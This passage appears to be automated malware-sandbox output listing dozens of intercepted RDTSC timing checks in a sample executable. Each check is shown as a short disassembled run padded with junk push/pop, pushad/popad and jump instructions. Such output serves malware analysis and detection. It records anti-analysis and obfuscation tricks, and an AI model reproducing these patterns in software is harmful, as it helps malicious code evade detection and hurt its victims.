Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A3EC90 second address: A3EC9E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F97B4EC49B8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A3EC9E second address: A3ECA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A3ECA4 second address: A3ECC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A3ECC2 second address: A3ECC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A44D12 second address: A44D1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F97B4EC49B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A44D1E second address: A44D6B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F97B4F2EDCCh 0x00000008 jne 00007F97B4F2EDC6h 0x0000000e jnl 00007F97B4F2EDCCh 0x00000014 jns 00007F97B4F2EDC6h 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pushad 0x0000001d pushad 0x0000001e jmp 00007F97B4F2EDD3h 0x00000023 jmp 00007F97B4F2EDD7h 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A44D6B second address: A44D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A44D71 second address: A44D8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A45312 second address: A4532B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F97B4EC49BDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A45732 second address: A4574F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4F2EDD8h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4574F second address: A4575C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jnp 00007F97B4EC49B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A459F6 second address: A45A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jno 00007F97B4F2EDC6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A45B6E second address: A45B8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F97B4EC49C8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A45B8C second address: A45B90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A45B90 second address: A45BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jl 00007F97B4EC49B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A462BC second address: A462C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A462C0 second address: A462D3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F97B4EC49B8h 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b jp 00007F97B4EC49B6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4D93E second address: A4D944 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4D944 second address: A4D950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4D950 second address: A4D954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4D954 second address: A4D95A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4DAA2 second address: A4DAAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4DC44 second address: A4DC48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4DC48 second address: A4DC5E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d jc 00007F97B4F2EDC6h 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4DC5E second address: A4DC68 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4DC68 second address: A4DC6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4DC6E second address: A4DC74 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4DC74 second address: A4DC81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4DC81 second address: A4DC87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4DC87 second address: A4DC97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4F2EDCBh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A4F596 second address: A4F59C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A5EAB4 second address: A5EAC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4F2EDCAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A5E794 second address: A5E7A4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F97B4EC49B6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A5E7A4 second address: A5E7A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A64A65 second address: A64A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A64A6B second address: A64A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A64A70 second address: A64A93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A64A93 second address: A64AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F97B4F2EDC6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A64AA0 second address: A64AA5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A6FB07 second address: A6FB1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDCCh 0x00000007 js 00007F97B4F2EDCCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A6F92B second address: A6F935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F97B4EC49B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A6F935 second address: A6F94B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDCCh 0x00000007 jc 00007F97B4F2EDC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A6F94B second address: A6F961 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F97B4EC49BDh 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A6F961 second address: A6F97F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4F2EDD8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A6F97F second address: A6F993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F97B4EC49BBh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A6F993 second address: A6F998 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A7744A second address: A7744E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A75E91 second address: A75E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A75E97 second address: A75E9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A75E9D second address: A75EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 jmp 00007F97B4F2EDD5h 0x0000000d jl 00007F97B4F2EDCCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A7600C second address: A76017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F97B4EC49B6h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A76017 second address: A7601C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A7601C second address: A76022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A76022 second address: A7602E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F97B4F2EDC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A766B5 second address: A766DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jg 00007F97B4EC49CFh 0x0000000d jmp 00007F97B4EC49C9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A766DB second address: A76706 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F97B4F2EDCEh 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007F97B4F2EDC6h 0x00000010 jmp 00007F97B4F2EDCBh 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jp 00007F97B4F2EDCCh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A76706 second address: A76723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4EC49C9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A76723 second address: A7672D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F97B4F2EDC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A77150 second address: A77169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 jp 00007F97B4EC49BEh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A77169 second address: A7716F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A7716F second address: A77173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A77173 second address: A77177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A77177 second address: A77181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A77181 second address: A7718B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F97B4F2EDC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A79F2A second address: A79F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A8AF2D second address: A8AF31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A8AF31 second address: A8AF3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F97B4EC49B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A8AF3D second address: A8AF54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD2h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A9A868 second address: A9A874 instructions: 0x00000000 rdtsc 0x00000002 js 00007F97B4EC49BEh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A9A874 second address: A9A87B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A9A87B second address: A9A890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4EC49BDh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A9A40B second address: A9A425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4F2EDD6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB57F4 second address: AB57F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB57F8 second address: AB5817 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F97B4F2EDD9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB47FB second address: AB4803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB4803 second address: AB480C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB480C second address: AB4823 instructions: 0x00000000 rdtsc 0x00000002 je 00007F97B4EC49C9h 0x00000008 jmp 00007F97B4EC49BDh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB520C second address: AB5220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4F2EDCDh 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB5220 second address: AB522E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F97B4EC49B6h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB5366 second address: AB536A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB536A second address: AB5376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB5376 second address: AB5385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jo 00007F97B4F2EDC6h 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB54E2 second address: AB54F2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F97B4EC49B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB6D35 second address: AB6D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB99E5 second address: AB99F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F97B4EC49B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB99F1 second address: AB99F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB99F5 second address: AB9A09 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F97B4EC49B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: ABC885 second address: ABC8E6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F97B4F2EDCAh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F97B4F2EDCEh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F97B4F2EDC8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov edx, dword ptr [ebp+122D2BB4h] 0x00000032 mov edx, ebx 0x00000034 push dword ptr [ebp+122D34DEh] 0x0000003a clc 0x0000003b push 9A6D1498h 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 push ebx 0x00000044 pop ebx 0x00000045 push eax 0x00000046 pop eax 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: ABC8E6 second address: ABC8F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F97B4EC49B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: ABE030 second address: ABE044 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F97B4F2EDD2h 0x0000000c jnl 00007F97B4F2EDC6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB01B2 second address: 4CB01CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB01CB second address: 4CB01E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
